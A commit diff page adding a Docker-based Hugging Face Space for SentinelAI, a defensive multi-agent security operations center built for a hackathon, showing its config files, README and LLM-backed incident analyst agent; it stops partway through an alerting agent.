iitian Cursor committed on
Commit
8b3905d
·
1 Parent(s): 6eea8b2

Sync SentinelAI project and add Hugging Face Docker Space layout.

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. .dockerignore +17 -0
  2. .env.example +58 -0
  3. .gitignore +14 -0
  4. Dockerfile +29 -0
  5. README.md +188 -1
  6. agents/__init__.py +1 -0
  7. agents/ai_analyst_agent.py +247 -0
  8. agents/alerting_agent.py +94 -0
  9. agents/incident_correlation_agent.py +90 -0
  10. agents/normalization_agent.py +44 -0
  11. agents/pentest_assistant.py +14 -0
  12. agents/remediation_agent.py +71 -0
  13. agents/risk_scoring_agent.py +46 -0
  14. agents/threat_detection_agent.py +119 -0
  15. agents/threat_enrichment_agent.py +121 -0
  16. api/.gitkeep +0 -0
  17. backend/__init__.py +0 -0
  18. backend/app/__init__.py +0 -0
  19. backend/app/main.py +304 -0
  20. collectors/__init__.py +1 -0
  21. collectors/collector_agent.py +147 -0
  22. components/.gitkeep +0 -0
  23. database/__init__.py +1 -0
  24. database/models.py +61 -0
  25. database/session.py +35 -0
  26. demo_logs/auth_demo.log +7 -0
  27. docker/Dockerfile.backend +21 -0
  28. docker/Dockerfile.frontend +22 -0
  29. docker/docker-compose.yml +69 -0
  30. docs/DEMO_SCRIPT.md +52 -0
  31. docs/PITCH.md +28 -0
  32. docs/RECORDING_CHECKLIST.md +26 -0
  33. frontend/.gitignore +41 -0
  34. frontend/.nvmrc +1 -0
  35. frontend/README.md +36 -0
  36. frontend/components.json +25 -0
  37. frontend/eslint.config.mjs +25 -0
  38. frontend/next.config.ts +13 -0
  39. frontend/package-lock.json +0 -0
  40. frontend/package.json +40 -0
  41. frontend/postcss.config.mjs +5 -0
  42. frontend/public/file.svg +1 -0
  43. frontend/public/globe.svg +1 -0
  44. frontend/public/next.svg +1 -0
  45. frontend/public/vercel.svg +1 -0
  46. frontend/public/window.svg +1 -0
  47. frontend/run-dev.sh +13 -0
  48. frontend/src/app/favicon.ico +0 -0
  49. frontend/src/app/globals.css +182 -0
  50. frontend/src/app/layout.tsx +33 -0
.dockerignore ADDED
@@ -0,0 +1,17 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .git
2
+ .gitattributes
3
+ .venv
4
+ .venv_py314
5
+ __pycache__
6
+ *.pyc
7
+ .pytest_cache
8
+ .mypy_cache
9
+ .ruff_cache
10
+ chroma_data
11
+ .env
12
+ frontend/node_modules
13
+ frontend/.next
14
+ *.log
15
+ import_profile*.txt
16
+ import_p3.txt
17
+ .tmp_import.log
.env.example ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Core services
2
+ DATABASE_URL=postgresql+asyncpg://sentinel:sentinel@localhost:5432/sentinelai
3
+ REDIS_URL=redis://localhost:6379/0
4
+ SKIP_DB=1
5
+ # AsyncPG connect timeout (seconds) when PostgreSQL is unreachable — avoids long hangs
6
+ DB_CONNECT_TIMEOUT_SEC=10
7
+ CORS_ORIGINS=http://localhost:3000
8
+
9
+ # Collectors
10
+ COLLECTOR_WATCH_DIR=./demo_logs
11
+ COLLECTOR_POLL_SEC=1.0
12
+ COLLECTOR_MISSING_RETRY_SEC=10
13
+ COLLECTOR_HOSTNAME=edge-01
14
+ COLLECTOR_FILE_PATHS=
15
+ COLLECT_AUTH_LOG=0
16
+ AUTH_LOG_PATH=/var/log/auth.log
17
+
18
+ ENABLE_MOCK_CLOUD_POLL=1
19
+
20
+ # LangGraph compile dry-run runs in the background after startup (optional skip / timeout)
21
+ # SKIP_LANGGRAPH_WARMUP=1
22
+ # LANGGRAPH_WARMUP_TIMEOUT_SEC=120
23
+
24
+ AUTO_AI_ON_INCIDENT=1
25
+ AUTO_AI_MIN_SEC=75
26
+
27
+ # Local LLM (Ollama)
28
+ OLLAMA_HOST=http://localhost:11434
29
+ OLLAMA_MODEL=llama3
30
+
31
+ # OpenAI-compatible inference (vLLM, Fireworks, OpenAI, etc.)
32
+ # Must be the INFERENCE base URL — not http://localhost:8000 (that is this app’s API).
33
+ # Fireworks example: https://api.fireworks.ai/inference/v1
34
+ VLLM_BASE_URL=
35
+ VLLM_API_KEY=
36
+ # Fireworks example: accounts/fireworks/models/deepseek-v4-pro
37
+ SENTINEL_LLM_MODEL=llama3
38
+ OPENAI_BASE_URL=
39
+ OPENAI_API_KEY=
40
+ LLM_TEMPERATURE=0.2
41
+ LLM_MAX_TOKENS=4096
42
+ # Optional Fireworks-style sampling: LLM_TOP_P=1 LLM_TOP_K=40
43
+
44
+ # Optional threat intel
45
+ ABUSEIPDB_API_KEY=
46
+ VIRUSTOTAL_API_KEY=
47
+ OTX_API_KEY=
48
+
49
+ # Alerting
50
+ SLACK_WEBHOOK_URL=
51
+ DISCORD_WEBHOOK_URL=
52
+ TEAMS_WEBHOOK_URL=
53
+ GENERIC_ALERT_WEBHOOK=
54
+
55
+ # Frontend (Next.js) — also set when running npm run dev
56
+ NEXT_PUBLIC_API_URL=http://localhost:8000
57
+
58
+ CHROMA_PERSIST_DIR=./chroma_data
.gitignore ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .venv/
2
+ .venv_py314/
3
+ __pycache__/
4
+ *.py[cod]
5
+ .pytest_cache/
6
+ .mypy_cache/
7
+ .ruff_cache/
8
+ chroma_data/
9
+ .env
10
+ frontend/.next/
11
+ frontend/node_modules/
12
+ dist/
13
+ *.log
14
+ !demo_logs/auth_demo.log
Dockerfile ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Hugging Face Spaces (Docker SDK) — app must listen on 7860.
2
+ # Space has no bundled Postgres/Redis; backend degrades with SKIP_DB / no REDIS_URL.
3
+ FROM python:3.12-slim
4
+
5
+ ENV PYTHONDONTWRITEBYTECODE=1 \
6
+ PYTHONUNBUFFERED=1 \
7
+ PYTHONPATH=/app \
8
+ SKIP_DB=1 \
9
+ SKIP_LANGGRAPH_WARMUP=1 \
10
+ ENABLE_MOCK_CLOUD_POLL=1 \
11
+ COLLECTOR_WATCH_DIR=/app/demo_logs \
12
+ CORS_ORIGINS="*"
13
+
14
+ WORKDIR /app
15
+
16
+ RUN apt-get update && apt-get install -y --no-install-recommends \
17
+ build-essential \
18
+ libpq-dev \
19
+ && rm -rf /var/lib/apt/lists/*
20
+
21
+ COPY requirements.txt /app/requirements.txt
22
+ RUN pip install --no-cache-dir -r /app/requirements.txt
23
+
24
+ COPY . /app
25
+
26
+ RUN mkdir -p /app/demo_logs
27
+
28
+ EXPOSE 7860
29
+ CMD ["uvicorn", "backend.app.main:app", "--host", "0.0.0.0", "--port", "7860"]
README.md CHANGED
@@ -4,9 +4,196 @@ emoji: 🏃
4
  colorFrom: red
5
  colorTo: pink
6
  sdk: docker
 
7
  pinned: false
8
  license: apache-2.0
9
  short_description: SentinelAI — Autonomous Multi-Agent AI SOC
10
  ---
11
 
12
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
4
  colorFrom: red
5
  colorTo: pink
6
  sdk: docker
7
+ app_port: 7860
8
  pinned: false
9
  license: apache-2.0
10
  short_description: SentinelAI — Autonomous Multi-Agent AI SOC
11
  ---
12
 
13
+ **This Hugging Face Space** runs the FastAPI control plane in Docker (no bundled PostgreSQL/Redis). The API is served on port **7860**; set `SKIP_DB=1` at build time for demo-grade startup.
14
+
15
+ ---
16
+
17
+ # SentinelAI — Autonomous Multi-Agent AI SOC
18
+
19
+ SentinelAI is a hackathon-grade, production-shaped **autonomous Security Operations Center**. It continuously ingests telemetry through collector agents, normalizes and enriches events, runs multi-modal detection (rules + heuristics + optional LLM reasoning on AMD ROCm), correlates attack chains, scores risk, drafts analyst narratives, emits remediation, and fans out alerts—while a **Next.js 15** command deck visualizes live operations.
20
+
21
+ ## Powered by AMD ROCm compute
22
+
23
+ - **Local open models**: wire `OLLAMA_HOST` to an Ollama instance backed by **AMD ROCm** on Linux (`ollama/ollama:rocm` in `docker/docker-compose.yml` comments).
24
+ - **Parallel agents**: FastAPI + `asyncio` execute enrichment, detection, correlation, and analyst tasks concurrently; GPU inference accelerates the analyst LLM path without shipping prompts to a proprietary SaaS.
25
+ - **Throughput**: ROCm lowers per-token latency for Llama 3, Qwen 2.5, Mistral, or DeepSeek-class models so multiple agents can reason on overlapping incidents.
26
+
27
+ ## Architecture
28
+
29
+ ```mermaid
30
+ flowchart TB
31
+ subgraph Infra[Infrastructure]
32
+ L[Linux auth/syslog]
33
+ D[Docker / K8s / Cloud mocks]
34
+ end
35
+ C[Collector Agent]
36
+ P[Parser Agent]
37
+ N[Normalization Agent]
38
+ E[Threat Enrichment Agent]
39
+ T[Threat Detection Agent]
40
+ G[LangGraph orchestration]
41
+ X[Incident Correlation Agent]
42
+ R[Risk Scoring Agent]
43
+ A[AI Analyst Agent]
44
+ M[Remediation Agent]
45
+ AL[Alerting Agent]
46
+ DB[(PostgreSQL)]
47
+ RD[(Redis)]
48
+ V[(Chroma optional)]
49
+ UI[Next.js 15 Dashboard]
50
+
51
+ Infra --> C
52
+ C --> P --> N --> E --> T
53
+ T --> G
54
+ G --> X --> R --> A --> M
55
+ E -.intel.-> V
56
+ T --> DB
57
+ X --> DB
58
+ AL --> RD
59
+ A --> UI
60
+ T --> UI
61
+ ```
62
+
63
+ ## Repository layout
64
+
65
+ | Path | Role |
66
+ | --- | --- |
67
+ | `frontend/` | Next.js 15 + Tailwind + shadcn + Framer Motion SOC deck |
68
+ | `backend/app/main.py` | FastAPI control plane + WebSockets |
69
+ | `agents/` | Threat, risk, analyst, remediation, alerting logic |
70
+ | `collectors/` | Autonomous async tailing collectors |
71
+ | `parsers/` | Log → structured `SecurityEvent` |
72
+ | `workflows/` | LangGraph multi-agent DAG |
73
+ | `database/` | SQLAlchemy models + async session |
74
+ | `models/` | Shared Pydantic schemas |
75
+ | `services/` | Pipeline, hub, metrics, optional Chroma |
76
+ | `docker/` | Compose + GPU-ready notes |
77
+ | `scripts/` | Demo attack replay |
78
+
79
+ ## Quick start (local)
80
+
81
+ ```bash
82
+ cd SentinelAI
83
+ python3 -m venv .venv && source .venv/bin/activate
84
+ pip install -r requirements.txt
85
+ cp .env.example .env
86
+ # optional: start postgres + redis, or export SKIP_DB=1 for demo-only persistence
87
+ export PYTHONPATH=$PWD
88
+ export SKIP_DB=1 # remove when PostgreSQL is available
89
+ ./scripts/run-backend-dev.sh
90
+ ```
91
+
92
+ Use `./scripts/run-backend-dev.sh` instead of `uvicorn ... --reload` from the repo root: reloading the whole tree also watches `.venv/site-packages` and can restart endlessly. The script scopes `--reload-dir` to Python source folders only.
93
+
94
+ ```bash
95
+ cd frontend
96
+ npm install
97
+ export NEXT_PUBLIC_API_URL=http://127.0.0.1:8000
98
+ npm run dev:22
99
+ ```
100
+
101
+ Use `npm run dev:22` (Node 22) if `npm run dev` fails with a Next.js `semver` error on newer Node versions.
102
+
103
+ Replay the scripted attack chain:
104
+
105
+ ```bash
106
+ python scripts/demo_attack.py
107
+ ```
108
+
109
+ **Continuous demo stream** (keeps generating traffic for judges):
110
+
111
+ ```bash
112
+ python scripts/continuous_demo.py
113
+ ```
114
+
115
+ **Linux auth.log (production-style):** set `COLLECT_AUTH_LOG=1` (and optionally `AUTH_LOG_PATH`) or add paths to `COLLECTOR_FILE_PATHS`. The collector waits until the file exists and tails new lines asynchronously.
116
+
117
+ **Attack replay (WOW):** after traffic has populated the buffer, call `POST /replay/start` with `{"delay_ms": 420}` or use the dashboard **Replay last chain** button to re-broadcast buffered detections/incidents over WebSockets.
118
+
119
+ **vLLM / OpenAI-compatible inference:** set `VLLM_BASE_URL` (or `OPENAI_BASE_URL`) and `SENTINEL_LLM_MODEL` to your served model; analyst reports use `/v1/chat/completions` before falling back to Ollama.
120
+
121
+ The UI listens on `NEXT_PUBLIC_API_URL` and opens a WebSocket to `/live-events`.
122
+
123
+ ## Docker Compose
124
+
125
+ ```bash
126
+ docker compose -f docker/docker-compose.yml up --build
127
+ ```
128
+
129
+ - API: `http://localhost:8000`
130
+ - UI: `http://localhost:3000`
131
+ - Uncomment the `ollama` service for ROCm hosts and align `OLLAMA_HOST`.
132
+
133
+ Install optional vector memory:
134
+
135
+ ```bash
136
+ pip install -r requirements-optional.txt
137
+ ```
138
+
139
+ ## Required API surface
140
+
141
+ | Endpoint | Description |
142
+ | --- | --- |
143
+ | `POST /ingest-logs` | Push raw logs / JSON events |
144
+ | `WS /live-events` | Real-time detections + incidents |
145
+ | `POST /detect-threats` | Parser → enrich → detect |
146
+ | `POST /correlate-incidents` | Recompute chains |
147
+ | `POST /generate-summary` | Body: `{ "incident_id": "..." }` |
148
+ | `POST /remediation` | Body: `{ "incident_id": "..." }` |
149
+ | `POST /send-alert` | Slack / Discord / Teams / webhook |
150
+ | `GET /dashboard-metrics` | KPIs for the deck |
151
+ | `POST /replay/start` | Re-stream buffered threat frames to WebSocket clients |
152
+ | `GET /replay-buffer` | Inspect replay buffer (debug) |
153
+ | `GET /rocm-panel` | AMD ROCm story + simulated GPU/agent load for the UI |
154
+
155
+ ## Open-source model matrix
156
+
157
+ | Role | Suggested weights |
158
+ | --- | --- |
159
+ | Reasoning | Llama 3, Qwen 2.5, DeepSeek, Mistral |
160
+ | Vision (future) | Qwen-VL, LLaVA for phishing/malware screenshots |
161
+ | Embeddings | BGE, E5 (plug into Chroma ingestion) |
162
+
163
+ Set `SENTINEL_LLM_MODEL` to the tag served by your ROCm Ollama runtime.
164
+
165
+ ## Live demo script (judges)
166
+
167
+ 1. **Start stack** — Docker Compose or local `uvicorn` + `npm run dev`.
168
+ 2. **Show autonomous collection** — tail `demo_logs/auth_demo.log` without manual uploads.
169
+ 3. **Fire demo** — `python scripts/demo_attack.py` or the in-UI **Simulate attack chain** button.
170
+ 4. **Narrate agents** — Collector → Parser → Normalization → Enrichment → Detection → LangGraph hop → Correlation → Risk → (optional) Analyst LLM on ROCm.
171
+ 5. **Pivot to response** — call `/remediation` + `/send-alert` with a webhook sink.
172
+ 6. **Close with differentiation** — autonomous agents, not a chatbot; on-prem models on AMD GPUs; evidence in PostgreSQL.
173
+
174
+ ## Pitch deck outline (copy into Slides / Gamma)
175
+
176
+ 1. **Problem** — SOC teams drown in telemetry; correlation is manual; cloud-only AI breaks data residency.
177
+ 2. **Solution** — SentinelAI fuses autonomous collectors, graph-based correlation, and open-weight LLMs.
178
+ 3. **Why now** — AMD ROCm makes on-prem inference cost-viable; LangGraph standardizes agent choreography.
179
+ 4. **Demo** — live WebSocket feed + incident graph + analyst summary.
180
+ 5. **Moat** — modular agents, MITRE mapping, optional TI hooks, Terraform-ready remediation stubs.
181
+ 6. **Ask** — design partners for managed SOC + on-prem appliance.
182
+
183
+ ## Demo & pitch (read before presenting)
184
+
185
+ - **Exact demo steps:** [docs/DEMO_SCRIPT.md](docs/DEMO_SCRIPT.md)
186
+ - **One-line pitch:** [docs/PITCH.md](docs/PITCH.md)
187
+ - **Backup recording:** [docs/RECORDING_CHECKLIST.md](docs/RECORDING_CHECKLIST.md)
188
+ - **AMD panel API:** `GET /rocm-panel` (drives the “Powered by AMD ROCm” dashboard section)
189
+
190
+ ## Judge explanation notes
191
+
192
+ - **Autonomy**: collectors run continuously; pipeline executes without human prompts.
193
+ - **Multi-agent**: LangGraph DAG + discrete services per concern (enrichment vs detection vs correlation).
194
+ - **Enterprise UX**: glassmorphism SOC deck, severity analytics, world heatmap, terminal channel.
195
+ - **Honest scope**: optional APIs (AbuseIPDB, VT, OTX) degrade gracefully; LLM path falls back to deterministic narratives if Ollama is offline.
196
+
197
+ ## Security notice
198
+
199
+ This repository ships **defensive** tooling and demo payloads. Only run against systems you own or have permission to test.
agents/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Autonomous SentinelAI security agents."""
agents/ai_analyst_agent.py ADDED
@@ -0,0 +1,247 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """AI Security Analyst — vLLM / OpenAI-compatible, Ollama, or cinematic fallback."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import json
6
+ import logging
7
+ import os
8
+ import re
9
+ from typing import Any
10
+
11
+ import httpx
12
+
13
+ logger = logging.getLogger(__name__)
14
+
15
+ from models.schemas import AnalystReport, Incident, RiskAssessment
16
+
17
+
18
async def generate_analyst_report(incident: Incident, risk: RiskAssessment) -> AnalystReport:
    """Produce an AnalystReport for *incident*, never failing outright.

    Backends are tried in order: an OpenAI-compatible endpoint (vLLM,
    Fireworks, OpenAI) when VLLM_BASE_URL/OPENAI_BASE_URL is set, then a
    local Ollama runtime, then a deterministic canned narrative — so a
    report is always returned even with no inference backend available.
    """
    briefing_prompt = _build_prompt(incident, risk)

    # 1) OpenAI-compatible endpoint, if configured.
    raw: str | None = None
    openai_base = (os.getenv("VLLM_BASE_URL") or os.getenv("OPENAI_BASE_URL") or "").strip()
    if openai_base:
        raw = await _openai_compatible_chat(
            openai_base,
            os.getenv("SENTINEL_LLM_MODEL", "meta-llama/Meta-Llama-3-8B-Instruct"),
            briefing_prompt,
        )

    # 2) Local Ollama runtime.
    if not raw:
        raw = await _ollama_generate(
            os.getenv("OLLAMA_HOST", "http://localhost:11434"),
            os.getenv("OLLAMA_MODEL", os.getenv("SENTINEL_LLM_MODEL", "llama3")),
            briefing_prompt,
        )

    # 3) Deterministic offline fallback.
    if not raw:
        raw = _cinematic_fallback_json(incident, risk)

    sections = _parse_analyst_json(raw, incident, risk)
    return AnalystReport(
        incident_id=incident.id,
        executive_summary=sections["executive_summary"],
        technical_analysis=sections["technical_analysis"],
        investigation_notes=sections["investigation_notes"],
        indicators=_extract_iocs(incident),
        recommended_actions=sections["recommended_actions"],
    )
47
+
48
+
49
def _build_prompt(incident: Incident, risk: RiskAssessment) -> str:
    """Render the strict-JSON analyst-briefing prompt sent to the LLM.

    The prompt demands exactly four string keys so the response can be
    consumed by `_parse_analyst_json` without markdown cleanup. Only the
    first 20 timeline rows are serialized to bound prompt size.
    """
    # default=str lets datetimes inside the timeline serialize cleanly.
    tl = json.dumps(incident.timeline[:20], default=str)
    return f"""You are a senior SOC analyst writing an executive-ready incident briefing.

Output ONLY valid JSON (no markdown fences) with exactly these string keys:
- "narrative": 2-4 sentences. Opening line MUST start with "SentinelAI detected". Enterprise tone: technical, concise, security-focused. Reference SSH/auth abuse, suspicious IPs, privilege moves, or outbound retrieval when applicable.
- "progression": numbered step-by-step attack progression (use \\n between steps). Map what likely happened chronologically.
- "severity_rationale": 2-3 sentences explaining why severity is justified (risk score {risk.risk_score}, label {risk.severity.value}), confidence, and blast radius.
- "recommended_actions": array of 4-7 short imperative strings (e.g. "Block offending IP at perimeter", "Rotate credentials for affected accounts", "Inspect shell history and authorized_keys", "Enable MFA on privileged users").

Incident title: {incident.title}
Machine summary: {incident.summary}
Risk: score={risk.risk_score} severity={risk.severity.value}
Timeline JSON: {tl}
"""
64
+
65
+
66
async def _openai_compatible_chat(base_url: str, model: str, prompt: str) -> str | None:
    """POST *prompt* to an OpenAI-compatible /v1/chat/completions endpoint.

    Returns the normalized JSON text of the first choice, or None on any
    HTTP / transport / parse failure so the caller can fall through to the
    next backend. Reads VLLM_API_KEY/OPENAI_API_KEY, LLM_MAX_TOKENS,
    LLM_TEMPERATURE and optional LLM_TOP_P / LLM_TOP_K from the environment.
    """
    key = os.getenv("VLLM_API_KEY") or os.getenv("OPENAI_API_KEY") or ""
    headers: dict[str, str] = {
        "Accept": "application/json",
        "Content-Type": "application/json",
    }
    if key:
        headers["Authorization"] = f"Bearer {key}"
    max_tokens = int(os.getenv("LLM_MAX_TOKENS", "4096"))
    payload: dict[str, Any] = {
        "model": model,
        "max_tokens": max_tokens,
        "temperature": float(os.getenv("LLM_TEMPERATURE", "0.2")),
        "messages": [
            {
                "role": "system",
                "content": "You write incident reports as strict JSON only. No markdown.",
            },
            {"role": "user", "content": prompt},
        ],
    }
    # Optional Fireworks-style sampling knobs — only sent when explicitly set.
    _top_p = os.getenv("LLM_TOP_P")
    if _top_p not in (None, ""):
        payload["top_p"] = float(_top_p)
    _top_k = os.getenv("LLM_TOP_K")
    if _top_k not in (None, ""):
        payload["top_k"] = int(_top_k)
    base = base_url.rstrip("/")
    # Accept bases configured with or without a trailing /v1.
    chat_url = f"{base}/chat/completions" if base.endswith("/v1") else f"{base}/v1/chat/completions"
    try:
        async with httpx.AsyncClient(timeout=120.0) as client:
            r = await client.post(
                chat_url,
                headers=headers,
                json=payload,
            )
            if r.status_code != 200:
                logger.warning(
                    "OpenAI-compatible chat failed: %s %s",
                    r.status_code,
                    (r.text or "")[:800],
                )
                return None
            data = r.json()
            choice = (data.get("choices") or [{}])[0]
            msg = choice.get("message") or {}
            content = (msg.get("content") or "").strip()
            return _normalize_llm_json(content)
    except httpx.HTTPError as exc:
        # Bug fix: transport errors were swallowed silently, making backend
        # misconfiguration (wrong VLLM_BASE_URL, DNS, TLS) invisible.
        logger.warning("OpenAI-compatible chat transport error: %s", exc)
        return None
    except Exception:  # noqa: BLE001
        # Unexpected failure (malformed JSON body, etc.) — log with traceback
        # instead of the previous silent `return None`.
        logger.exception("OpenAI-compatible chat unexpected failure")
        return None
116
+
117
+
118
+ def _normalize_llm_json(content: str) -> str:
119
+ s = content.strip()
120
+ fence = re.match(r"^```(?:json)?\s*([\s\S]*?)```$", s, re.IGNORECASE)
121
+ if fence:
122
+ s = fence.group(1).strip()
123
+ try:
124
+ json.loads(s)
125
+ return s
126
+ except json.JSONDecodeError:
127
+ m = re.search(r"\{[\s\S]*\}", s)
128
+ if m:
129
+ return m.group(0).strip()
130
+ return s
131
+
132
+
133
async def _ollama_generate(host: str, model: str, prompt: str) -> str | None:
    """Call a local Ollama /api/generate endpoint (non-streaming).

    Returns the stripped response text, or None on any HTTP or transport
    failure so the caller can fall back to the canned narrative.
    """
    endpoint = f"{host.rstrip('/')}/api/generate"
    body = {"model": model, "prompt": prompt, "stream": False}
    try:
        async with httpx.AsyncClient(timeout=120.0) as client:
            resp = await client.post(endpoint, json=body)
            if resp.status_code != 200:
                return None
            return (resp.json().get("response") or "").strip()
    except Exception:  # noqa: BLE001
        return None
145
+
146
+
147
def _parse_analyst_json(blob: str, incident: Incident, risk: RiskAssessment) -> dict[str, Any]:
    """Parse the LLM's JSON briefing into the four report sections.

    Accepts the canonical keys plus legacy aliases ("executive",
    "technical", "notes", "actions"). Any missing or empty section is
    backfilled with a deterministic default; an unusable blob falls back to
    the canned briefing entirely.
    """
    try:
        data = json.loads(blob)
    except json.JSONDecodeError:
        return _cinematic_fallback_dict(incident, risk)
    # Bug fix: a blob that is valid JSON but not an object (e.g. "[]" or
    # "5") previously raised AttributeError on .get(); treat it as unusable.
    if not isinstance(data, dict):
        return _cinematic_fallback_dict(incident, risk)

    narrative = str(data.get("narrative") or data.get("executive") or "").strip()
    progression = str(data.get("progression") or data.get("technical") or "").strip()
    sev = str(data.get("severity_rationale") or data.get("notes") or "").strip()
    actions = data.get("recommended_actions") or data.get("actions") or []
    if isinstance(actions, str):
        # Tolerate a newline-joined bullet list instead of a JSON array.
        actions = [x.strip("- •\t ") for x in actions.split("\n") if x.strip()]
    if not isinstance(actions, list):
        actions = []
    actions = [str(a).strip() for a in actions if str(a).strip()][:12]

    if not narrative:
        # Without a narrative the briefing is unusable; use the canned one.
        return _cinematic_fallback_dict(incident, risk)
    if not progression:
        progression = _default_progression(incident)
    if not sev:
        sev = _default_severity_rationale(risk)
    if not actions:
        actions = _default_actions()

    return {
        "executive_summary": narrative,
        "technical_analysis": progression,
        "investigation_notes": sev,
        "recommended_actions": actions,
    }
178
+
179
+
180
def _cinematic_fallback_json(incident: Incident, risk: RiskAssessment) -> str:
    """Serialize the deterministic fallback briefing in the LLM's JSON shape."""
    sections = _cinematic_fallback_dict(incident, risk)
    remapped = {
        "narrative": sections["executive_summary"],
        "progression": sections["technical_analysis"],
        "severity_rationale": sections["investigation_notes"],
        "recommended_actions": sections["recommended_actions"],
    }
    return json.dumps(remapped)
190
+
191
+
192
def _cinematic_fallback_dict(incident: Incident, risk: RiskAssessment) -> dict[str, Any]:
    """Deterministic, LLM-free briefing used when no inference backend answers."""
    summary = (
        "SentinelAI detected correlated authentication and host telemetry consistent with a targeted intrusion "
        f"chain against assets tied to “{incident.title}”. "
        "Repeated SSH authentication failures from a concentrated source were followed by successful session "
        "establishment and privileged execution patterns indicative of post-compromise activity. "
        "Outbound retrieval-style commands suggest possible payload staging or command-and-control preparation."
    )
    return {
        "executive_summary": summary,
        "technical_analysis": _default_progression(incident),
        "investigation_notes": _default_severity_rationale(risk),
        "recommended_actions": _default_actions(),
    }
205
+
206
+
207
+ def _default_progression(incident: Incident) -> str:
208
+ lines = [
209
+ "1. Reconnaissance / credential spray against SSH surface from a high-velocity source IP.",
210
+ "2. Brute-force or password-spray phase producing clustered authentication failures.",
211
+ "3. Successful authentication — pivot from noise to confirmed access.",
212
+ "4. Privilege escalation via sudo or equivalent administrative channel.",
213
+ "5. Potential exfil or staging via scripted download utilities (e.g. curl/wget) to non-standard paths.",
214
+ ]
215
+ if incident.timeline:
216
+ lines.append(f"6. Correlated timeline contains {len(incident.timeline)} normalized events for graph reconstruction.")
217
+ return "\n".join(lines)
218
+
219
+
220
+ def _default_severity_rationale(risk: RiskAssessment) -> str:
221
+ return (
222
+ f"Severity is driven by a composite risk score of {risk.risk_score}/100 with label {risk.severity.value}. "
223
+ f"The sequence combines authentication abuse with privilege boundary crossing, elevating impact beyond "
224
+ f"nuisance scanning. Confidence reflects rule-and-window correlation across multiple telemetry stages; "
225
+ f"treat as incident-grade until disproven by host forensics."
226
+ )
227
+
228
+
229
+ def _default_actions() -> list[str]:
230
+ return [
231
+ "Block offending IP at perimeter firewall and WAF allowlists",
232
+ "Rotate credentials and invalidate active sessions for implicated accounts",
233
+ "Inspect shell history, authorized_keys, and cron for persistence",
234
+ "Enable or enforce MFA on all break-glass and sudo-capable users",
235
+ "Isolate affected host to a quarantine VLAN for memory and disk capture",
236
+ "Review outbound DNS and proxy logs for matching IOC time windows",
237
+ ]
238
+
239
+
240
+ def _extract_iocs(incident: Incident) -> list[str]:
241
+ iocs: list[str] = []
242
+ for row in incident.timeline:
243
+ msg = str(row.get("msg", ""))
244
+ for token in msg.split():
245
+ if token.count(".") == 3 and token.replace(".", "").isdigit():
246
+ iocs.append(token)
247
+ return list(dict.fromkeys(iocs))[:16]
agents/alerting_agent.py ADDED
@@ -0,0 +1,94 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Alerting agent — Slack, Discord, email, Teams, webhooks."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import os
6
+ from typing import Any
7
+
8
+ import httpx
9
+
10
+ from models.schemas import AlertPayload, Severity
11
+
12
+
13
+ async def send_alert(payload: AlertPayload) -> dict[str, Any]:
14
+ channel = payload.channel.lower()
15
+ if channel == "slack":
16
+ return await _slack(payload)
17
+ if channel == "discord":
18
+ return await _discord(payload)
19
+ if channel == "teams":
20
+ return await _teams(payload)
21
+ if channel == "email":
22
+ return {"status": "queued", "detail": "Configure SMTP — payload logged server-side"}
23
+ if channel == "webhook":
24
+ return await _webhook(payload)
25
+ return {"status": "ignored", "channel": channel}
26
+
27
+
28
+ async def _slack(payload: AlertPayload) -> dict[str, Any]:
29
+ url = os.getenv("SLACK_WEBHOOK_URL")
30
+ if not url:
31
